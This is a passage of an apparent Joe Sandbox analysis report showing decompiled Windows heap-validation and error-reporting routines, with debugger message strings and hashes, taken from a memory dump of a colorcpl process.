                                                                                                • Go determine why that thread has not released the critical section., xrefs: 06ECB3C5
                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 06ECB352
                                                                                                • *** enter .exr %p for the exception record, xrefs: 06ECB4F1
                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 06ECB476
                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 06ECB2F3
                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 06ECB47D
                                                                                                • The instruction at %p referenced memory at %p., xrefs: 06ECB432
                                                                                                • write to, xrefs: 06ECB4A6
                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 06ECB38F
                                                                                                • read from, xrefs: 06ECB4AD, 06ECB4B2
                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 06ECB48F
                                                                                                • a NULL pointer, xrefs: 06ECB4E0
                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 06ECB323
                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 06ECB3D6
                                                                                                • *** enter .cxr %p for the context, xrefs: 06ECB50D
                                                                                                • The resource is owned shared by %d threads, xrefs: 06ECB37E
                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 06ECB39B
                                                                                                • The instruction at %p tried to %s , xrefs: 06ECB4B6
                                                                                                • The critical section is owned by thread %p., xrefs: 06ECB3B9
                                                                                                • *** Inpage error in %ws:%s, xrefs: 06ECB418
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                • API String ID: 0-108210295
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 44%
                                                                                                			E06ED1C06() {
                                                                                                				signed int _t27;
                                                                                                				char* _t104;
                                                                                                				char* _t105;
                                                                                                				intOrPtr _t113;
                                                                                                				intOrPtr _t115;
                                                                                                				intOrPtr _t117;
                                                                                                				intOrPtr _t119;
                                                                                                				intOrPtr _t120;
                                                                                                
                                                                                                				_t105 = 0x6df48a4;
                                                                                                				_t104 = "HEAP: ";
                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                					_push(_t104);
                                                                                                					E06E1B150();
                                                                                                				} else {
                                                                                                					E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                				}
                                                                                                				_push( *0x6f0589c);
                                                                                                				E06E1B150("Heap error detected at %p (heap handle %p)\n",  *0x6f058a0);
                                                                                                				_t27 =  *0x6f05898; // 0x0
                                                                                                				if(_t27 <= 0xf) {
                                                                                                					switch( *((intOrPtr*)(_t27 * 4 +  &M06ED1E96))) {
                                                                                                						case 0:
                                                                                                							_t105 = "heap_failure_internal";
                                                                                                							goto L21;
                                                                                                						case 1:
                                                                                                							goto L21;
                                                                                                						case 2:
                                                                                                							goto L21;
                                                                                                						case 3:
                                                                                                							goto L21;
                                                                                                						case 4:
                                                                                                							goto L21;
                                                                                                						case 5:
                                                                                                							goto L21;
                                                                                                						case 6:
                                                                                                							goto L21;
                                                                                                						case 7:
                                                                                                							goto L21;
                                                                                                						case 8:
                                                                                                							goto L21;
                                                                                                						case 9:
                                                                                                							goto L21;
                                                                                                						case 0xa:
                                                                                                							goto L21;
                                                                                                						case 0xb:
                                                                                                							goto L21;
                                                                                                						case 0xc:
                                                                                                							goto L21;
                                                                                                						case 0xd:
                                                                                                							goto L21;
                                                                                                						case 0xe:
                                                                                                							goto L21;
                                                                                                						case 0xf:
                                                                                                							goto L21;
                                                                                                					}
                                                                                                				}
                                                                                                				L21:
                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                					_push(_t104);
                                                                                                					E06E1B150();
                                                                                                				} else {
                                                                                                					E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                				}
                                                                                                				_push(_t105);
                                                                                                				E06E1B150("Error code: %d - %s\n",  *0x6f05898);
                                                                                                				_t113 =  *0x6f058a4; // 0x0
                                                                                                				if(_t113 != 0) {
                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                						_push(_t104);
                                                                                                						E06E1B150();
                                                                                                					} else {
                                                                                                						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                					}
                                                                                                					E06E1B150("Parameter1: %p\n",  *0x6f058a4);
                                                                                                				}
                                                                                                				_t115 =  *0x6f058a8; // 0x0
                                                                                                				if(_t115 != 0) {
                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                						_push(_t104);
                                                                                                						E06E1B150();
                                                                                                					} else {
                                                                                                						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                					}
                                                                                                					E06E1B150("Parameter2: %p\n",  *0x6f058a8);
                                                                                                				}
                                                                                                				_t117 =  *0x6f058ac; // 0x0
                                                                                                				if(_t117 != 0) {
                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                						_push(_t104);
                                                                                                						E06E1B150();
                                                                                                					} else {
                                                                                                						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                					}
                                                                                                					E06E1B150("Parameter3: %p\n",  *0x6f058ac);
                                                                                                				}
                                                                                                				_t119 =  *0x6f058b0; // 0x0
                                                                                                				if(_t119 != 0) {
                                                                                                					L41:
                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                						_push(_t104);
                                                                                                						E06E1B150();
                                                                                                					} else {
                                                                                                						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                					}
                                                                                                					_push( *0x6f058b4);
                                                                                                					E06E1B150("Last known valid blocks: before - %p, after - %p\n",  *0x6f058b0);
                                                                                                				} else {
                                                                                                					_t120 =  *0x6f058b4; // 0x0
                                                                                                					if(_t120 != 0) {
                                                                                                						goto L41;
                                                                                                					}
                                                                                                				}
                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                					_push(_t104);
                                                                                                					E06E1B150();
                                                                                                				} else {
                                                                                                					E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                				}
                                                                                                				return E06E1B150("Stack trace available at %p\n", 0x6f058c0);
                                                                                                			}












                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                • API String ID: 0-2897834094
                                                                                                • Opcode ID: d184fb4fd6dc065834f859a7421a30050bfefcba92a6198b1b9c5f301948fb53
                                                                                                • Instruction ID: 05bdb98c1741c15cc014fac1159368e9c45170d07864b0ab85c7c677e66e38af
                                                                                                • Opcode Fuzzy Hash: d184fb4fd6dc065834f859a7421a30050bfefcba92a6198b1b9c5f301948fb53
                                                                                                • Instruction Fuzzy Hash: 0B61F736A25384DFF3D59B84E885DA173E9EB0492170AB43AF9096F741C670DC86CE4A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 59%
                                                                                                			E06ED4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                				signed int _v6;
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t189;
                                                                                                				intOrPtr _t191;
                                                                                                				intOrPtr _t210;
                                                                                                				signed int _t225;
                                                                                                				signed char _t231;
                                                                                                				intOrPtr _t232;
                                                                                                				unsigned int _t245;
                                                                                                				intOrPtr _t249;
                                                                                                				intOrPtr _t259;
                                                                                                				signed int _t281;
                                                                                                				signed int _t283;
                                                                                                				intOrPtr _t284;
                                                                                                				signed int _t288;
                                                                                                				signed int* _t294;
                                                                                                				signed int* _t298;
                                                                                                				intOrPtr* _t299;
                                                                                                				intOrPtr* _t300;
                                                                                                				signed int _t307;
                                                                                                				signed int _t309;
                                                                                                				signed short _t312;
                                                                                                				signed short _t315;
                                                                                                				signed int _t317;
                                                                                                				signed int _t320;
                                                                                                				signed int _t322;
                                                                                                				signed int _t326;
                                                                                                				signed int _t327;
                                                                                                				void* _t328;
                                                                                                				signed int _t332;
                                                                                                				signed int _t340;
                                                                                                				signed int _t342;
                                                                                                				signed char _t344;
                                                                                                				signed int* _t345;
                                                                                                				void* _t346;
                                                                                                				signed char _t352;
                                                                                                				signed char _t367;
                                                                                                				signed int _t374;
                                                                                                				intOrPtr* _t378;
                                                                                                				signed int _t380;
                                                                                                				signed int _t385;
                                                                                                				signed char _t390;
                                                                                                				unsigned int _t392;
                                                                                                				signed char _t395;
                                                                                                				unsigned int _t397;
                                                                                                				intOrPtr* _t400;
                                                                                                				signed int _t402;
                                                                                                				signed int _t405;
                                                                                                				intOrPtr* _t406;
                                                                                                				signed int _t407;
                                                                                                				intOrPtr _t412;
                                                                                                				void* _t414;
                                                                                                				signed int _t415;
                                                                                                				signed int _t416;
                                                                                                				signed int _t429;
                                                                                                
                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                				_t189 = 0;
                                                                                                				_v8 = _v8 & 0;
                                                                                                				_t332 = __edx;
                                                                                                				_v12 = 0;
                                                                                                				_t414 = __ecx;
                                                                                                				_t415 = __edx;
                                                                                                				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                                                                                					L88:
                                                                                                					_t416 = _v16;
                                                                                                					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                                                                                						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                                                                                						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                                                                                							L107:
                                                                                                							return 1;
                                                                                                						}
                                                                                                						_t191 =  *[fs:0x30];
                                                                                                						__eflags =  *(_t191 + 0xc);
                                                                                                						if( *(_t191 + 0xc) == 0) {
                                                                                                							_push("HEAP: ");
                                                                                                							E06E1B150();
                                                                                                						} else {
                                                                                                							E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                						}
                                                                                                						_push(_v12);
                                                                                                						_push( *((intOrPtr*)(_t332 + 0x30)));
                                                                                                						_push(_t332);
                                                                                                						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                                                                                						L122:
                                                                                                						E06E1B150();
                                                                                                						L119:
                                                                                                						return 0;
                                                                                                					}
                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                						_push("HEAP: ");
                                                                                                						E06E1B150();
                                                                                                					} else {
                                                                                                						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                					}
                                                                                                					_push(_t416);
                                                                                                					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                                                                                					_push(_t332);
                                                                                                					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                                                                                					goto L122;
                                                                                                				} else {
                                                                                                					goto L1;
                                                                                                				}
                                                                                                				do {
                                                                                                					L1:
                                                                                                					 *_a16 = _t415;
                                                                                                					if( *(_t414 + 0x4c) != 0) {
                                                                                                						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                                                                                						 *_t415 = _t392;
                                                                                                						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                                                                                						_t424 = _t392 >> 0x18 - _t352;
                                                                                                						if(_t392 >> 0x18 != _t352) {
                                                                                                							_push(_t352);
                                                                                                							E06ECFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                                                                                						}
                                                                                                					}
                                                                                                					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                                                                                						_t210 =  *[fs:0x30];
                                                                                                						__eflags =  *(_t210 + 0xc);
                                                                                                						if( *(_t210 + 0xc) == 0) {
                                                                                                							_push("HEAP: ");
                                                                                                							E06E1B150();
                                                                                                						} else {
                                                                                                							E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                						}
                                                                                                						_push(_v8 & 0x0000ffff);
                                                                                                						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                                                                                						__eflags = _t340;
                                                                                                						_push(_t340);
                                                                                                						E06E1B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                                                                                						L117:
                                                                                                						__eflags =  *(_t414 + 0x4c);
                                                                                                						if( *(_t414 + 0x4c) != 0) {
                                                                                                							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                                                                							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                							__eflags =  *_t415;
                                                                                                						}
                                                                                                						goto L119;
                                                                                                					}
                                                                                                					_t225 =  *_t415 & 0x0000ffff;
                                                                                                					_t390 =  *(_t415 + 2);
                                                                                                					_t342 = _t225;
                                                                                                					_v8 = _t342;
                                                                                                					_v20 = _t342;
                                                                                                					_v28 = _t225 << 3;
                                                                                                					if((_t390 & 0x00000001) == 0) {
                                                                                                						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                                                                                						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                                                                                						__eflags = _t344 & 0x00000001;
                                                                                                						if((_t344 & 0x00000001) == 0) {
                                                                                                							L66:
                                                                                                							_t345 = _a12;
                                                                                                							 *_a8 =  *_a8 + 1;
                                                                                                							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                                                                                							__eflags =  *_t345;
                                                                                                							L67:
                                                                                                							_t231 =  *(_t415 + 6);
                                                                                                							if(_t231 == 0) {
                                                                                                								_t346 = _t414;
                                                                                                							} else {
                                                                                                								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                							}
                                                                                                							if(_t346 != _t332) {
                                                                                                								_t232 =  *[fs:0x30];
                                                                                                								__eflags =  *(_t232 + 0xc);
                                                                                                								if( *(_t232 + 0xc) == 0) {
                                                                                                									_push("HEAP: ");
                                                                                                									E06E1B150();
                                                                                                								} else {
                                                                                                									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                								}
                                                                                                								_push( *(_t415 + 6) & 0x000000ff);
                                                                                                								_push(_t415);
                                                                                                								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                                                                                								goto L95;
                                                                                                							} else {
                                                                                                								if( *((char*)(_t415 + 7)) != 3) {
                                                                                                									__eflags =  *(_t414 + 0x4c);
                                                                                                									if( *(_t414 + 0x4c) != 0) {
                                                                                                										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                                                										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                										__eflags =  *_t415;
                                                                                                									}
                                                                                                									_t415 = _t415 + _v28;
                                                                                                									__eflags = _t415;
                                                                                                									goto L86;
                                                                                                								}
                                                                                                								_t245 =  *(_t415 + 0x1c);
                                                                                                								if(_t245 == 0) {
                                                                                                									_t395 =  *_t415 & 0x0000ffff;
                                                                                                									_v6 = _t395 >> 8;
                                                                                                									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                                                                                									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                                                                										__eflags =  *(_t414 + 0x4c);
                                                                                                										if( *(_t414 + 0x4c) != 0) {
                                                                                                											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                                                                                											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                											__eflags =  *_t415;
                                                                                                										}
                                                                                                										goto L107;
                                                                                                									}
                                                                                                									_t249 =  *[fs:0x30];
                                                                                                									__eflags =  *(_t249 + 0xc);
                                                                                                									if( *(_t249 + 0xc) == 0) {
                                                                                                										_push("HEAP: ");
                                                                                                										E06E1B150();
                                                                                                									} else {
                                                                                                										E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                									}
                                                                                                									_push( *((intOrPtr*)(_t332 + 0x28)));
                                                                                                									_push(_t415);
                                                                                                									_push("Heap block at %p is not last block in segment (%p)\n");
                                                                                                									L95:
                                                                                                									E06E1B150();
                                                                                                									goto L117;
                                                                                                								}
                                                                                                								_v12 = _v12 + 1;
                                                                                                								_v16 = _v16 + (_t245 >> 0xc);
                                                                                                								if( *(_t414 + 0x4c) != 0) {
                                                                                                									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                                                									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                								}
                                                                                                								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                                                                                								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                                                                									L82:
                                                                                                									_v8 = _v8 & 0x00000000;
                                                                                                									goto L86;
                                                                                                								} else {
                                                                                                									if( *(_t414 + 0x4c) != 0) {
                                                                                                										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                                                                                										 *_t415 = _t397;
                                                                                                										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                                                                                										_t442 = _t397 >> 0x18 - _t367;
                                                                                                										if(_t397 >> 0x18 != _t367) {
                                                                                                											_push(_t367);
                                                                                                											E06ECFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                                                                                										}
                                                                                                									}
                                                                                                									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                                                                                										_t259 =  *[fs:0x30];
                                                                                                										__eflags =  *(_t259 + 0xc);
                                                                                                										if( *(_t259 + 0xc) == 0) {
                                                                                                											_push("HEAP: ");
                                                                                                											E06E1B150();
                                                                                                										} else {
                                                                                                											E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                										}
                                                                                                										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                                                                                										_push(_t415);
                                                                                                										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                                                                                										goto L95;
                                                                                                									} else {
                                                                                                										if( *(_t414 + 0x4c) != 0) {
                                                                                                											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                                                                											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                										}
                                                                                                										goto L82;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_t281 = _v28 + 0xfffffff0;
                                                                                                						_v24 = _t281;
                                                                                                						__eflags = _t390 & 0x00000002;
                                                                                                						if((_t390 & 0x00000002) != 0) {
                                                                                                							__eflags = _t281 - 4;
                                                                                                							if(_t281 > 4) {
                                                                                                								_t281 = _t281 - 4;
                                                                                                								__eflags = _t281;
                                                                                                								_v24 = _t281;
                                                                                                							}
                                                                                                						}
                                                                                                						__eflags = _t390 & 0x00000008;
                                                                                                						if((_t390 & 0x00000008) == 0) {
                                                                                                							_t102 = _t415 + 0x10; // -8
                                                                                                							_t283 = E06E6D540(_t102, _t281, 0xfeeefeee);
                                                                                                							_v20 = _t283;
                                                                                                							__eflags = _t283 - _v24;
                                                                                                							if(_t283 != _v24) {
                                                                                                								_t284 =  *[fs:0x30];
                                                                                                								__eflags =  *(_t284 + 0xc);
                                                                                                								if( *(_t284 + 0xc) == 0) {
                                                                                                									_push("HEAP: ");
                                                                                                									E06E1B150();
                                                                                                								} else {
                                                                                                									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                								}
                                                                                                								_t288 = _v20 + 8 + _t415;
                                                                                                								__eflags = _t288;
                                                                                                								_push(_t288);
                                                                                                								_push(_t415);
                                                                                                								_push("Free Heap block %p modified at %p after it was freed\n");
                                                                                                								goto L95;
                                                                                                							}
                                                                                                							goto L66;
                                                                                                						} else {
                                                                                                							_t374 =  *(_t415 + 8);
                                                                                                							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                                                                                							_v24 = _t374;
                                                                                                							_v28 = _t400;
                                                                                                							_t294 =  *(_t374 + 4);
                                                                                                							__eflags =  *_t400 - _t294;
                                                                                                							if( *_t400 != _t294) {
                                                                                                								L64:
                                                                                                								_push(_t374);
                                                                                                								_push( *_t400);
                                                                                                								_t101 = _t415 + 8; // -16
                                                                                                								E06EDA80D(_t414, 0xd, _t101, _t294);
                                                                                                								goto L86;
                                                                                                							}
                                                                                                							_t56 = _t415 + 8; // -16
                                                                                                							__eflags =  *_t400 - _t56;
                                                                                                							_t374 = _v24;
                                                                                                							if( *_t400 != _t56) {
                                                                                                								goto L64;
                                                                                                							}
                                                                                                							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                                                                                							_t402 =  *(_t414 + 0xb4);
                                                                                                							__eflags = _t402;
                                                                                                							if(_t402 == 0) {
                                                                                                								L35:
                                                                                                								_t298 = _v28;
                                                                                                								 *_t298 = _t374;
                                                                                                								 *(_t374 + 4) = _t298;
                                                                                                								__eflags =  *(_t415 + 2) & 0x00000008;
                                                                                                								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                                                                                									L39:
                                                                                                									_t377 =  *_t415 & 0x0000ffff;
                                                                                                									_t299 = _t414 + 0xc0;
                                                                                                									_v28 =  *_t415 & 0x0000ffff;
                                                                                                									 *(_t415 + 2) = 0;
                                                                                                									 *((char*)(_t415 + 7)) = 0;
                                                                                                									__eflags =  *(_t414 + 0xb4);
                                                                                                									if( *(_t414 + 0xb4) == 0) {
                                                                                                										_t378 =  *_t299;
                                                                                                									} else {
                                                                                                										_t378 = E06E3E12C(_t414, _t377);
                                                                                                										_t299 = _t414 + 0xc0;
                                                                                                									}
                                                                                                									__eflags = _t299 - _t378;
                                                                                                									if(_t299 == _t378) {
                                                                                                										L51:
                                                                                                										_t300 =  *((intOrPtr*)(_t378 + 4));
                                                                                                										__eflags =  *_t300 - _t378;
                                                                                                										if( *_t300 != _t378) {
                                                                                                											_push(_t378);
                                                                                                											_push( *_t300);
                                                                                                											__eflags = 0;
                                                                                                											E06EDA80D(0, 0xd, _t378, 0);
                                                                                                										} else {
                                                                                                											_t87 = _t415 + 8; // -16
                                                                                                											_t406 = _t87;
                                                                                                											 *_t406 = _t378;
                                                                                                											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                                                                                											 *_t300 = _t406;
                                                                                                											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                                                                                										}
                                                                                                										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                                                                                										_t405 =  *(_t414 + 0xb4);
                                                                                                										__eflags = _t405;
                                                                                                										if(_t405 == 0) {
                                                                                                											L61:
                                                                                                											__eflags =  *(_t414 + 0x4c);
                                                                                                											if(__eflags != 0) {
                                                                                                												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                                                												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                											}
                                                                                                											goto L86;
                                                                                                										} else {
                                                                                                											_t380 =  *_t415 & 0x0000ffff;
                                                                                                											while(1) {
                                                                                                												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                                                                                												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                                                                                													break;
                                                                                                												}
                                                                                                												_t307 =  *_t405;
                                                                                                												__eflags = _t307;
                                                                                                												if(_t307 == 0) {
                                                                                                													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                                                                                													L60:
                                                                                                													_t94 = _t415 + 8; // -16
                                                                                                													E06E3E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                                                                                													goto L61;
                                                                                                												}
                                                                                                												_t405 = _t307;
                                                                                                											}
                                                                                                											_t309 = _t380;
                                                                                                											goto L60;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t407 =  *(_t414 + 0x4c);
                                                                                                										while(1) {
                                                                                                											__eflags = _t407;
                                                                                                											if(_t407 == 0) {
                                                                                                												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                                                                                											} else {
                                                                                                												_t315 =  *(_t378 - 8);
                                                                                                												_t407 =  *(_t414 + 0x4c);
                                                                                                												__eflags = _t315 & _t407;
                                                                                                												if((_t315 & _t407) != 0) {
                                                                                                													_t315 = _t315 ^  *(_t414 + 0x50);
                                                                                                													__eflags = _t315;
                                                                                                												}
                                                                                                												_t312 = _t315 & 0x0000ffff;
                                                                                                											}
                                                                                                											__eflags = _v28 - (_t312 & 0x0000ffff);
                                                                                                											if(_v28 <= (_t312 & 0x0000ffff)) {
                                                                                                												goto L51;
                                                                                                											}
                                                                                                											_t378 =  *_t378;
                                                                                                											__eflags = _t414 + 0xc0 - _t378;
                                                                                                											if(_t414 + 0xc0 != _t378) {
                                                                                                												continue;
                                                                                                											}
                                                                                                											goto L51;
                                                                                                										}
                                                                                                										goto L51;
                                                                                                									}
                                                                                                								}
                                                                                                								_t317 = E06E3A229(_t414, _t415);
                                                                                                								__eflags = _t317;
                                                                                                								if(_t317 != 0) {
                                                                                                									goto L39;
                                                                                                								}
                                                                                                								E06E3A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                                                                                								goto L86;
                                                                                                							}
                                                                                                							_t385 =  *_t415 & 0x0000ffff;
                                                                                                							while(1) {
                                                                                                								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                                                                                								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t320 =  *_t402;
                                                                                                								__eflags = _t320;
